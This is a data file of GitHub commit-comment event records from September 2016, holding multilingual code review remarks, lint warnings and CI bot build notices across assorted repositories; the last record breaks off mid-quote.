{"id":"4643302813","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"mplatzer/BTYDplus"},"payload":{"comment":{"id":19240555,"position":null,"line":null,"path":null,"commit_id":"e2322d70458b2d555ec9be8b1d88eb1f2936ba6a","created_at":"2016-09-30T13:03:23Z","updated_at":"2016-09-30T13:03:23Z","body":"[R/mbg-cnbd-k.R:874:5:](https://github.com/mplatzer/BTYDplus/blob/e2322d70458b2d555ec9be8b1d88eb1f2936ba6a/R/mbg-cnbd-k.R#L874) *warning:* **local variable 'p' assigned but may not be used**\n```r\n​    p <- ps[i]\n    ^\n```"}},"created_at":"2016-09-30T13:03:23Z"}
{"id":"4643305932","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":19240564,"position":27,"line":27,"path":"ALGORYTHMS/sort_files/myhash.h","commit_id":"a272cdb01362da9ed22e12a9979782176fc2fab3","created_at":"2016-09-30T13:04:02Z","updated_at":"2016-09-30T13:04:02Z","body":"Какое-то непонятное название у функции.\r\nОна же вроде хеш строки вычисляет?\r\nТогда `hash`, `hash_for_string`, `string_to_hash` и т.п. более уместны."}},"created_at":"2016-09-30T13:04:02Z"}
{"id":"4643308385","type":"CommitCommentEvent","actor":{"login":"mingxuWang"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19240573,"position":449,"line":449,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-30T13:04:33Z","updated_at":"2016-09-30T13:04:33Z","body":"为什么不用app.navigate方法而要用window.location呢？"}},"created_at":"2016-09-30T13:04:33Z"}
{"id":"4643312344","type":"CommitCommentEvent","actor":{"login":"bracketttc"},"repo":{"name":"bracketttc/poco"},"payload":{"comment":{"id":19240586,"position":null,"line":null,"path":null,"commit_id":"df8e0929083621ad4ed8359e3690efa38a300a27","created_at":"2016-09-30T13:05:23Z","updated_at":"2016-09-30T13:05:23Z","body":"Okay.\r\n\r\nCMake will generate both of those. But, it adds an additional build-time dependency that you may not want and I get that. In the [packaging scripts](https://github.com/pocoproject/distro/), it looks like it would be trivial to get the Fedora script to use CMake to generate the Makefiles and order the build, but I don't have the familiarity and haven't invested the time to figure out how to do the same for the Ubuntu/Debian script.\r\n\r\nObviously, Windows is something of a lost cause in that regard -- the only thing you can do is add an additional requirement that the builder install CMake and have it on their PATH. I'm fairly certain that the Windows installer doesn't default to that state and you have to purposefully ask it to do so.\r\n\r\nI'm not trying to be an obnoxious CMake evangelist, honestly. Also, I appreciate your responses. I'll close the PR, since it's clear that it's not the right fit at the time."}},"created_at":"2016-09-30T13:05:23Z"}
{"id":"4643312346","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"rscipien/zap-extensions"},"payload":{"comment":{"id":19240587,"position":10,"line":174,"path":"test/org/zaproxy/zap/extension/ScannerTestUtils.java","commit_id":"d463e75b82206011561432185098990d7e75f7ad","created_at":"2016-09-30T13:05:23Z","updated_at":"2016-09-30T13:05:23Z","body":"What about the other param?"}},"created_at":"2016-09-30T13:05:23Z"}
{"id":"4643313601","type":"CommitCommentEvent","actor":{"login":"jjlakis"},"repo":{"name":"rbradford/rkt"},"payload":{"comment":{"id":19240591,"position":21,"line":21,"path":"stage1/usr_from_kvm/qemu-lite.mk","commit_id":"c27adada0cb8e6a077e1e2af3a00e309da8fec0a","created_at":"2016-09-30T13:05:39Z","updated_at":"2016-09-30T13:05:39Z","body":"@rbradford We need --static option here to be sure that QEMU is builded as static binary. Dynamic build causes problems with running on light systems such as CoreOS. See https://github.com/coreos/rkt/pull/2952 to check our discussion about --static."}},"created_at":"2016-09-30T13:05:39Z"}
{"id":"4643314139","type":"CommitCommentEvent","actor":{"login":"Evisceration"},"repo":{"name":"Evisceration/DeviceControl"},"payload":{"comment":{"id":19240593,"position":5,"line":26,"path":"app/src/main/java/org/namelessrom/devicecontrol/modules/cpu/CpuUtils.java","commit_id":"e911dd4e008412c3912eebdfffb99d47020b4e2a","created_at":"2016-09-30T13:05:46Z","updated_at":"2016-09-30T13:05:46Z","body":"hjbvasd"}},"created_at":"2016-09-30T13:05:46Z"}
{"id":"4643315726","type":"CommitCommentEvent","actor":{"login":"monperrus"},"repo":{"name":"INRIA/spoon"},"payload":{"comment":{"id":19240596,"position":null,"line":null,"path":null,"commit_id":"cff5f642a89212a48bf9a14f65f0b83548f920f6","created_at":"2016-09-30T13:06:06Z","updated_at":"2016-09-30T13:06:06Z","body":"what about anonymous classes and references to final variables?"}},"created_at":"2016-09-30T13:06:06Z"}
{"id":"4643318950","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19240600,"position":null,"line":null,"path":null,"commit_id":"c9291ccb7d2f7ab42facc94d868f47ebfc3d10ce","created_at":"2016-09-30T13:06:46Z","updated_at":"2016-09-30T13:06:46Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#TdngBdoPQCCBa20CfxjIKw"}},"created_at":"2016-09-30T13:06:46Z"}
{"id":"4643319031","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"halogenOS/android_frameworks_base"},"payload":{"comment":{"id":19240602,"position":null,"line":null,"path":null,"commit_id":"544d63195a031cb0c69c4b56763fc72491fdbba4","created_at":"2016-09-30T13:06:47Z","updated_at":"2016-09-30T13:06:47Z","body":"Lol, steve kondik actually already had fixed this the same way: https://github.com/CyanogenMod/android_frameworks_base/commit/0b9109c90bc1909b89d3c4d7f13ee7485dca3b97\r\n\r\nBut I wasn't looking for any commit, just fixed it myself lol."}},"created_at":"2016-09-30T13:06:47Z"}
{"id":"4643321348","type":"CommitCommentEvent","actor":{"login":"trainline-em-bot"},"repo":{"name":"trainline/environment-manager"},"payload":{"comment":{"id":19240612,"position":null,"line":null,"path":null,"commit_id":"c6477f99e7d0bb668f1329e80fd3a9a9a20de005","created_at":"2016-09-30T13:07:15Z","updated_at":"2016-09-30T13:07:15Z","body":"TeamCity Platform Services :: Environment Manager :: Run Tests [Build 26](http://infra.teamcity.ci.ttldev/viewLog.html?buildId=33120&buildTypeId=PlatformServices_EnvironmentManager_RunTests) is now running\n"}},"created_at":"2016-09-30T13:07:15Z"}
{"id":"4643322083","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"rscipien/zap-extensions"},"payload":{"comment":{"id":19240613,"position":57,"line":57,"path":"test/org/zaproxy/zap/extension/pscanrulesBeta/InsecureAuthenticationScanUnitTest.java","commit_id":"d463e75b82206011561432185098990d7e75f7ad","created_at":"2016-09-30T13:07:23Z","updated_at":"2016-09-30T13:07:23Z","body":"Seems to be a missing e in the function name"}},"created_at":"2016-09-30T13:07:23Z"}
{"id":"4643324463","type":"CommitCommentEvent","actor":{"login":"cozy1"},"repo":{"name":"rscustom/rocksmith-custom-song-toolkit"},"payload":{"comment":{"id":19240622,"position":4,"line":315,"path":"RocksmithTookitGUI/RocksmithToolkitGUI.csproj","commit_id":"a49c23221908b900c8d250ec00dfaeb407be1a33","created_at":"2016-09-30T13:07:55Z","updated_at":"2016-09-30T13:07:55Z","body":"A slip of the keystroke.  This was removed."}},"created_at":"2016-09-30T13:07:55Z"}
{"id":"4643326842","type":"CommitCommentEvent","actor":{"login":"mingxuWang"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19240628,"position":14,"line":14,"path":"madanni/coupon/coupon.less","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-30T13:08:27Z","updated_at":"2016-09-30T13:08:27Z","body":"这就是no-coupon-item的缩写吗？不使用优惠券是什么意思？是指不能使用？"}},"created_at":"2016-09-30T13:08:27Z"}
{"id":"4643328111","type":"CommitCommentEvent","actor":{"login":"trainline-em-bot"},"repo":{"name":"trainline/environment-manager"},"payload":{"comment":{"id":19240632,"position":null,"line":null,"path":null,"commit_id":"c6477f99e7d0bb668f1329e80fd3a9a9a20de005","created_at":"2016-09-30T13:08:44Z","updated_at":"2016-09-30T13:08:44Z","body":"TeamCity Platform Services :: Environment Manager :: Run Tests [Build 26](http://infra.teamcity.ci.ttldev/viewLog.html?buildId=33120&buildTypeId=PlatformServices_EnvironmentManager_RunTests) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:01:30"}},"created_at":"2016-09-30T13:08:44Z"}
{"id":"4643332218","type":"CommitCommentEvent","actor":{"login":"jroimartin"},"repo":{"name":"rust-lang/rustup.sh"},"payload":{"comment":{"id":19240642,"position":null,"line":null,"path":null,"commit_id":"5059e4e7f74e955d65b63d7f0652a88af8c9cfae","created_at":"2016-09-30T13:09:36Z","updated_at":"2016-09-30T13:09:36Z","body":"Also, what about this?\r\n\r\nhttps://github.com/rust-lang/rustup.sh/blob/master/rustup.sh#L239-L243"}},"created_at":"2016-09-30T13:09:36Z"}
{"id":"4643333338","type":"CommitCommentEvent","actor":{"login":"cozy1"},"repo":{"name":"rscustom/rocksmith-custom-song-toolkit"},"payload":{"comment":{"id":19240646,"position":17,"line":30,"path":"RocksmithToolkitCLI/artistfolders/Program.cs","commit_id":"a49c23221908b900c8d250ec00dfaeb407be1a33","created_at":"2016-09-30T13:09:51Z","updated_at":"2016-09-30T13:09:51Z","body":"Oops.  Pull code from my personal stuff that has typo's.  ;("}},"created_at":"2016-09-30T13:09:51Z"}
{"id":"4643336082","type":"CommitCommentEvent","actor":{"login":"wagner"},"repo":{"name":"DeveloperCielo/Webservice-1.5"},"payload":{"comment":{"id":19240652,"position":null,"line":null,"path":null,"commit_id":"f9ca53cb918c1bcbd43d7cfed44ebc22d1fbde09","created_at":"2016-09-30T13:10:24Z","updated_at":"2016-09-30T13:10:24Z","body":"@netojoaobatista se o certificado é assinado por uma entidade certificadora, por que vocês pedem pra atualizar ele no servidor quem requista o webservice?"}},"created_at":"2016-09-30T13:10:24Z"}
{"id":"4643338764","type":"CommitCommentEvent","actor":{"login":"stijnvanhoey"},"repo":{"name":"PieterjanVerhelst/resident-eel-polder-analysis"},"payload":{"comment":{"id":19240660,"position":44,"line":44,"path":"src/Creeks_dataH_analysis.R","commit_id":"3c9cda45a0d31e1466910a14a01ee825f962a2cd","created_at":"2016-09-30T13:10:57Z","updated_at":"2016-09-30T13:10:57Z","body":"Lubridat provides functionality both for month and year, so you could use the function `year`, just as you use the function `month`"}},"created_at":"2016-09-30T13:10:57Z"}
{"id":"4643340365","type":"CommitCommentEvent","actor":{"login":"Kogoro"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19240665,"position":9,"line":8,"path":"plugins/de.ovgu.featureide.fm.ui/src/de/ovgu/featureide/fm/ui/editors/featuremodel/actions/colors/SetFeatureColorDialog.java","commit_id":"0d4f56d3c88ebed8a55cf648812ecdff654b061e","created_at":"2016-09-30T13:11:16Z","updated_at":"2016-09-30T13:11:16Z","body":"Copyright notices should be correct ;)"}},"created_at":"2016-09-30T13:11:16Z"}
{"id":"4643343160","type":"CommitCommentEvent","actor":{"login":"cozy1"},"repo":{"name":"rscustom/rocksmith-custom-song-toolkit"},"payload":{"comment":{"id":19240669,"position":null,"line":null,"path":null,"commit_id":"a49c23221908b900c8d250ec00dfaeb407be1a33","created_at":"2016-09-30T13:11:51Z","updated_at":"2016-09-30T13:11:51Z","body":"uwelcome  We will have to monitor in game behavior closely to make sure it does not break something."}},"created_at":"2016-09-30T13:11:51Z"}
{"id":"4643344211","type":"CommitCommentEvent","actor":{"login":"retuxx"},"repo":{"name":"INRIA/spoon"},"payload":{"comment":{"id":19240673,"position":null,"line":null,"path":null,"commit_id":"cff5f642a89212a48bf9a14f65f0b83548f920f6","created_at":"2016-09-30T13:12:03Z","updated_at":"2016-09-30T13:12:03Z","body":"That's a good point. Do you have an idea how to solve this? Stopping at class level is not an option since you may find a variable declared in another method."}},"created_at":"2016-09-30T13:12:03Z"}
{"id":"4643347812","type":"CommitCommentEvent","actor":{"login":"rvdsteege"},"repo":{"name":"pronamic/wp-pronamic-ideal"},"payload":{"comment":{"id":19240682,"position":null,"line":null,"path":null,"commit_id":"e7914b1af9864e4c21db7013a5f7dce3f9e5b0b5","created_at":"2016-09-30T13:12:51Z","updated_at":"2016-09-30T13:12:51Z","body":"Oops, apparently my administrator role had `create_payments` granted, which I was seeing a **Add new** button at the iDEAL » Payments page. Indeed solved by removing the `create_payments` capability from the role. Commit reversed in https://github.com/pronamic/wp-pronamic-ideal/commit/88262fb70cd23d4e1af3e6d9c95d78848849dfed"}},"created_at":"2016-09-30T13:12:51Z"}
{"id":"4643348804","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"rscipien/zap-extensions"},"payload":{"comment":{"id":19240684,"position":null,"line":null,"path":null,"commit_id":"d463e75b82206011561432185098990d7e75f7ad","created_at":"2016-09-30T13:13:03Z","updated_at":"2016-09-30T13:13:03Z","body":"Could you mak the function names more descriptive?\r\n\r\nhttps://github.com/zaproxy/zaproxy/wiki/DevGuidelines#unit-test-specific-guidelines"}},"created_at":"2016-09-30T13:13:03Z"}
{"id":"4643349413","type":"CommitCommentEvent","actor":{"login":"psypod"},"repo":{"name":"BenFrankel/CH-Analysis"},"payload":{"comment":{"id":19240685,"position":null,"line":null,"path":null,"commit_id":"14b3f8b16e8e2a803617cb7b43b0be96fd8f675c","created_at":"2016-09-30T13:13:11Z","updated_at":"2016-09-30T13:13:11Z","body":"what tool are you using for diagram creation?"}},"created_at":"2016-09-30T13:13:11Z"}
{"id":"4643351566","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19240690,"position":null,"line":null,"path":null,"commit_id":"bf91494b0d4438ce34abb12768d6d367f83baf23","created_at":"2016-09-30T13:13:37Z","updated_at":"2016-09-30T13:13:37Z","body":"Initial commit."}},"created_at":"2016-09-30T13:13:37Z"}
{"id":"4643353203","type":"CommitCommentEvent","actor":{"login":"idma88"},"repo":{"name":"idma88/site-req"},"payload":{"comment":{"id":19240693,"position":null,"line":null,"path":null,"commit_id":"82c251255bce64ff06327ebaded425d16bf8094d","created_at":"2016-09-30T13:13:54Z","updated_at":"2016-09-30T13:13:54Z","body":"Done [issue #14]"}},"created_at":"2016-09-30T13:13:54Z"}
{"id":"4643353374","type":"CommitCommentEvent","actor":{"login":"Sch3lp"},"repo":{"name":"pxlit-projects/classroom-exercise-1-bun00b"},"payload":{"comment":{"id":19240694,"position":null,"line":null,"path":null,"commit_id":"c914bb189c7888fbeaef226d087d9ca139debfdd","created_at":"2016-09-30T13:13:57Z","updated_at":"2016-09-30T13:13:57Z","body":"Goed antwoord wise ass 😄\r\n\r\nBeter antwoord was geweest: _omdat de originele code ook defaulte naar LazyWorkEthic_. 😉 "}},"created_at":"2016-09-30T13:13:57Z"}
{"id":"4643353747","type":"CommitCommentEvent","actor":{"login":"netojoaobatista"},"repo":{"name":"DeveloperCielo/Webservice-1.5"},"payload":{"comment":{"id":19240696,"position":null,"line":null,"path":null,"commit_id":"f9ca53cb918c1bcbd43d7cfed44ebc22d1fbde09","created_at":"2016-09-30T13:14:02Z","updated_at":"2016-09-30T13:14:02Z","body":"Ué, porque quando você fizer a integração será necessário estabelecer uma comunicação criptografada através do protocolo TLS 1.2. Se seu servidor não conhecer o certificado, a probabilidade de erros de comunicação é enorme.\r\n\r\n:smile: "}},"created_at":"2016-09-30T13:14:02Z"}
{"id":"4643354308","type":"CommitCommentEvent","actor":{"login":"Kogoro"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19240698,"position":25,"line":537,"path":"plugins/de.ovgu.featureide.fm.ui/src/de/ovgu/featureide/fm/ui/editors/FeatureDiagramEditor.java","commit_id":"5880763516d412aa2d431239d617578a19693fcd","created_at":"2016-09-30T13:14:08Z","updated_at":"2016-09-30T13:14:08Z","body":"Why should be the entries visible when nothing is selected?"}},"created_at":"2016-09-30T13:14:08Z"}
{"id":"4643356524","type":"CommitCommentEvent","actor":{"login":"mfonville"},"repo":{"name":"opengapps/all"},"payload":{"comment":{"id":19240704,"position":null,"line":null,"path":null,"commit_id":"558f6852f084ff700b2091773748ae0367a78295","created_at":"2016-09-30T13:14:34Z","updated_at":"2016-09-30T13:14:34Z","body":"@HardLight it seems Nougat frameworks don't work on pre-Nougat devices (unlike was the case with previous major updates, there were no problems). I am working on a fix."}},"created_at":"2016-09-30T13:14:34Z"}
{"id":"4643360039","type":"CommitCommentEvent","actor":{"login":"Kogoro"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19240708,"position":14,"line":46,"path":"plugins/de.ovgu.featureide.fm.core/src/de/ovgu/featureide/fm/core/color/FeatureColor.java","commit_id":"b8025048ca6c0c98e5af0e37dcf5f91d59e63140","created_at":"2016-09-30T13:15:15Z","updated_at":"2016-09-30T13:15:15Z","body":"Maybe toSWTColor() ?"}},"created_at":"2016-09-30T13:15:15Z"}
{"id":"4643360435","type":"CommitCommentEvent","actor":{"login":"ezio84"},"repo":{"name":"AOSIP/platform_frameworks_base"},"payload":{"comment":{"id":19240709,"position":null,"line":null,"path":null,"commit_id":"12540055ade6faf74a1ce0951aa0eee26180d994","created_at":"2016-09-30T13:15:19Z","updated_at":"2016-09-30T13:15:19Z","body":"Np dude! PS: also the settings part has some improvements"}},"created_at":"2016-09-30T13:15:19Z"}
{"id":"4643362598","type":"CommitCommentEvent","actor":{"login":"Kogoro"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19240715,"position":18,"line":478,"path":"plugins/de.ovgu.featureide.fm.ui/src/de/ovgu/featureide/fm/ui/editors/FeatureDiagramEditor.java","commit_id":"b8025048ca6c0c98e5af0e37dcf5f91d59e63140","created_at":"2016-09-30T13:15:47Z","updated_at":"2016-09-30T13:15:47Z","body":"Could be removed?"}},"created_at":"2016-09-30T13:15:47Z"}
{"id":"4643363915","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19240717,"position":null,"line":null,"path":null,"commit_id":"400cf4ed600fc37953e427d01a0d8ea395ffd88f","created_at":"2016-09-30T13:16:02Z","updated_at":"2016-09-30T13:16:02Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/33763/testReport/) for this commit**"}},"created_at":"2016-09-30T13:16:02Z"}
{"id":"4643370127","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19240731,"position":null,"line":null,"path":null,"commit_id":"1af6d34fb048953b97260df515228b6e3aa878f6","created_at":"2016-09-30T13:17:15Z","updated_at":"2016-09-30T13:17:15Z","body":"Initial commit."}},"created_at":"2016-09-30T13:17:15Z"}
{"id":"4643370702","type":"CommitCommentEvent","actor":{"login":"rafaelrguerra"},"repo":{"name":"rafaelrguerra/paulo-leonardo-rafaelGuerra"},"payload":{"comment":{"id":19240732,"position":null,"line":null,"path":null,"commit_id":"6c85daa2f8e66d8103b94ad0dfb7a699da1389ba","created_at":"2016-09-30T13:17:22Z","updated_at":"2016-09-30T13:17:22Z","body":"\r\n[Site Oficial.zip](https://github.com/rafaelrguerra/paulo-leonardo-rafaelGuerra/files/503020/Site.Oficial.zip)\r\n"}},"created_at":"2016-09-30T13:17:22Z"}
{"id":"4643372291","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19240737,"position":null,"line":null,"path":null,"commit_id":"9bc2ff064462b1e8018c792a41814501e03bc6ff","created_at":"2016-09-30T13:17:40Z","updated_at":"2016-09-30T13:17:40Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.276.9bc2ff064462b1e8018c792a41814501e03bc6ff](http://build.palaso.org/viewLog.html?buildId=77287&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **FAILURE**\nSummary: Execution timeout Build time: 00:35:42"}},"created_at":"2016-09-30T13:17:40Z"}
{"id":"4643372605","type":"CommitCommentEvent","actor":{"login":"trainline-em-bot"},"repo":{"name":"trainline/environment-manager"},"payload":{"comment":{"id":19240739,"position":null,"line":null,"path":null,"commit_id":"7ec2952a3fdc94f9e74da8c1d2399c5abe17e617","created_at":"2016-09-30T13:17:44Z","updated_at":"2016-09-30T13:17:44Z","body":"TeamCity Platform Services :: Environment Manager :: Run Tests [Build 27](http://infra.teamcity.ci.ttldev/viewLog.html?buildId=33121&buildTypeId=PlatformServices_EnvironmentManager_RunTests) is now running\n"}},"created_at":"2016-09-30T13:17:44Z"}
{"id":"4643372819","type":"CommitCommentEvent","actor":{"login":"rafaelrguerra"},"repo":{"name":"rafaelrguerra/paulo-leonardo-rafaelGuerra"},"payload":{"comment":{"id":19240740,"position":null,"line":null,"path":null,"commit_id":"6c85daa2f8e66d8103b94ad0dfb7a699da1389ba","created_at":"2016-09-30T13:17:46Z","updated_at":"2016-09-30T13:17:46Z","body":"Professora, não sei se a postagem está correta"}},"created_at":"2016-09-30T13:17:46Z"}
{"id":"4643373057","type":"CommitCommentEvent","actor":{"login":"duwanjiang"},"repo":{"name":"goagent/goagent"},"payload":{"comment":{"id":19240741,"position":null,"line":null,"path":null,"commit_id":"e492ed0283f5cde7cf71d7ac47429f64aa48cd13","created_at":"2016-09-30T13:17:49Z","updated_at":"2016-09-30T13:17:49Z","body":"谢谢作者"}},"created_at":"2016-09-30T13:17:49Z"}
{"id":"4643373732","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/bobtemplates.plone"},"payload":{"comment":{"id":19240742,"position":null,"line":null,"path":null,"commit_id":"72ecf313dcacc7919ddcebfa86e2dc74d49eb580","created_at":"2016-09-30T13:17:57Z","updated_at":"2016-09-30T13:17:57Z","body":"@AuroreMariscal you need to sign Plone Contributor Agreement in order to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html"}},"created_at":"2016-09-30T13:17:57Z"}
{"id":"4643373796","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/bobtemplates.plone"},"payload":{"comment":{"id":19240743,"position":null,"line":null,"path":null,"commit_id":"72ecf313dcacc7919ddcebfa86e2dc74d49eb580","created_at":"2016-09-30T13:17:58Z","updated_at":"2016-09-30T13:17:58Z","body":"AuroreMariscal your emails are not known to GithHb and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2016-09-30T13:17:58Z"}
{"id":"4643377473","type":"CommitCommentEvent","actor":{"login":"xlxfoxxlx"},"repo":{"name":"AOSIP/platform_frameworks_base"},"payload":{"comment":{"id":19240749,"position":null,"line":null,"path":null,"commit_id":"12540055ade6faf74a1ce0951aa0eee26180d994","created_at":"2016-09-30T13:18:41Z","updated_at":"2016-09-30T13:18:41Z","body":"Lol yea I was hesitant as I seen it was updated a couple times I'll fix it\nup. Thanks again.\n\nOn Fri, Sep 30, 2016, 9:15 AM Ezio Lacandia Bijelkic <\nnotifications@github.com> wrote:\n\n> Np dude! PS: also the settings part has some improvements\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/AOSIP/platform_frameworks_base/commit/12540055ade6faf74a1ce0951aa0eee26180d994#commitcomment-19240709>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABTw0S9i_1teIhOJr2wIczS9C-scRkKTks5qvQtogaJpZM4KKr2Q>\n> .\n>\n"}},"created_at":"2016-09-30T13:18:41Z"}
{"id":"4643378057","type":"CommitCommentEvent","actor":{"login":"Kogoro"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19240752,"position":94,"line":100,"path":"plugins/de.ovgu.featureide.fm.ui/src/de/ovgu/featureide/fm/ui/editors/featuremodel/actions/colors/SetFeatureColorAction.java","commit_id":"b8025048ca6c0c98e5af0e37dcf5f91d59e63140","created_at":"2016-09-30T13:18:48Z","updated_at":"2016-09-30T13:18:48Z","body":"First Comment then Param and Result"}},"created_at":"2016-09-30T13:18:48Z"}
{"id":"4643380368","type":"CommitCommentEvent","actor":{"login":"trainline-em-bot"},"repo":{"name":"trainline/environment-manager"},"payload":{"comment":{"id":19240759,"position":null,"line":null,"path":null,"commit_id":"7ec2952a3fdc94f9e74da8c1d2399c5abe17e617","created_at":"2016-09-30T13:19:17Z","updated_at":"2016-09-30T13:19:17Z","body":"TeamCity Platform Services :: Environment Manager :: Run Tests [Build 27](http://infra.teamcity.ci.ttldev/viewLog.html?buildId=33121&buildTypeId=PlatformServices_EnvironmentManager_RunTests) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:01:33"}},"created_at":"2016-09-30T13:19:17Z"}
{"id":"4643382637","type":"CommitCommentEvent","actor":{"login":"cozy1"},"repo":{"name":"rscustom/rocksmith-custom-song-toolkit"},"payload":{"comment":{"id":19240763,"position":22,"line":50,"path":"RocksmithTookitGUI/MainForm.cs","commit_id":"a49c23221908b900c8d250ec00dfaeb407be1a33","created_at":"2016-09-30T13:19:43Z","updated_at":"2016-09-30T13:19:43Z","body":"I thought you would like this one the best.  ;) "}},"created_at":"2016-09-30T13:19:43Z"}
{"id":"4643382940","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19240765,"position":null,"line":null,"path":null,"commit_id":"d9bc9dd5234f2fc1cea0b5c80fcf6343f06bf92d","created_at":"2016-09-30T13:19:46Z","updated_at":"2016-09-30T13:19:46Z","body":"Initial commit."}},"created_at":"2016-09-30T13:19:46Z"}
{"id":"4643384970","type":"CommitCommentEvent","actor":{"login":"ibunbury"},"repo":{"name":"ibunbury/hello-world"},"payload":{"comment":{"id":19240769,"position":null,"line":null,"path":null,"commit_id":"94dd76b8f89077d4a99b1fd959c5973616c0a0d5","created_at":"2016-09-30T13:20:10Z","updated_at":"2016-09-30T13:20:10Z","body":"This is my first commit"}},"created_at":"2016-09-30T13:20:10Z"}
{"id":"4643385447","type":"CommitCommentEvent","actor":{"login":"dreispt"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19240770,"position":null,"line":null,"path":null,"commit_id":"76c443eda331b75bf5dfa7ec22b8eb22e1084343","created_at":"2016-09-30T13:20:15Z","updated_at":"2016-09-30T13:20:15Z","body":"👏 "}},"created_at":"2016-09-30T13:20:15Z"}
{"id":"4643390669","type":"CommitCommentEvent","actor":{"login":"rlf"},"repo":{"name":"dutchy1001/uSkyBlock"},"payload":{"comment":{"id":19240779,"position":null,"line":null,"path":null,"commit_id":"52438d5e85dc5745d4c87737d83a695f57277e59","created_at":"2016-09-30T13:21:17Z","updated_at":"2016-09-30T13:21:17Z","body":"Not the right way to do it.\r\nShould be:\r\n´´´\r\nplayer.sendMessage(tr(\"\\u00a7aInvite sent to {0}\", otherPlayer.getDisplayName()));\r\n```"}},"created_at":"2016-09-30T13:21:17Z"}
{"id":"4643391623","type":"CommitCommentEvent","actor":{"login":"ezio84"},"repo":{"name":"AOSIP/platform_frameworks_base"},"payload":{"comment":{"id":19240785,"position":null,"line":null,"path":null,"commit_id":"12540055ade6faf74a1ce0951aa0eee26180d994","created_at":"2016-09-30T13:21:29Z","updated_at":"2016-09-30T13:21:29Z","body":"Eheheeh ye now it's finished for real :P :D "}},"created_at":"2016-09-30T13:21:29Z"}
{"id":"4643391689","type":"CommitCommentEvent","actor":{"login":"AlexOugh"},"repo":{"name":"SungardAS/aws-services"},"payload":{"comment":{"id":19240786,"position":13,"line":127,"path":"cloudformation/iam_federation.js","commit_id":"3f45772ffdab32c3fa3ab4ca58402c655d5284c0","created_at":"2016-09-30T13:21:30Z","updated_at":"2016-09-30T13:21:30Z","body":"looks good"}},"created_at":"2016-09-30T13:21:30Z"}
{"id":"4643391947","type":"CommitCommentEvent","actor":{"login":"Kogoro"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19240787,"position":43,"line":43,"path":"plugins/de.ovgu.featureide.fm.ui/src/de/ovgu/featureide/fm/ui/wizards/SelectColorSchemePage.java","commit_id":"b8025048ca6c0c98e5af0e37dcf5f91d59e63140","created_at":"2016-09-30T13:21:33Z","updated_at":"2016-09-30T13:21:33Z","body":"Please add description"}},"created_at":"2016-09-30T13:21:33Z"}
{"id":"4643392625","type":"CommitCommentEvent","actor":{"login":"van562"},"repo":{"name":"andreaiacono/OpenCVDemo"},"payload":{"comment":{"id":19240789,"position":null,"line":null,"path":null,"commit_id":"e681aea13d35a2f9a0d3b12c1fb175a639813f2b","created_at":"2016-09-30T13:21:41Z","updated_at":"2016-09-30T13:21:41Z","body":"I went to that website and I don't know if that website is even working. It\nwon't let me download anything.  If I'm not able to use NN for FR, can you\nhelp me with eigenfaces?   I want to do something similar like yours.\nThank you for the  help.\n\nOn Friday, September 30, 2016, Andrea Iacono <notifications@github.com>\nwrote:\n\n> from a quick search on google, I've found this:\n> http://neuroph.sourceforge.net/tutorials/FaceRecognition/\n> FaceRecognitionUsingNeuralNetwork.html\n> maybe it's a good starting point.\n> Sorry, I can't do anything more than suggesting because I never used\n> NeuralNetworks for face recognition: OpenCV (the library I used in this\n> project) uses Eigenfaces for doing it.\n>\n> HTH,\n> Andrea\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/andreaiacono/OpenCVDemo/commit/e681aea13d35a2f9a0d3b12c1fb175a639813f2b#commitcomment-19240534>,\n> 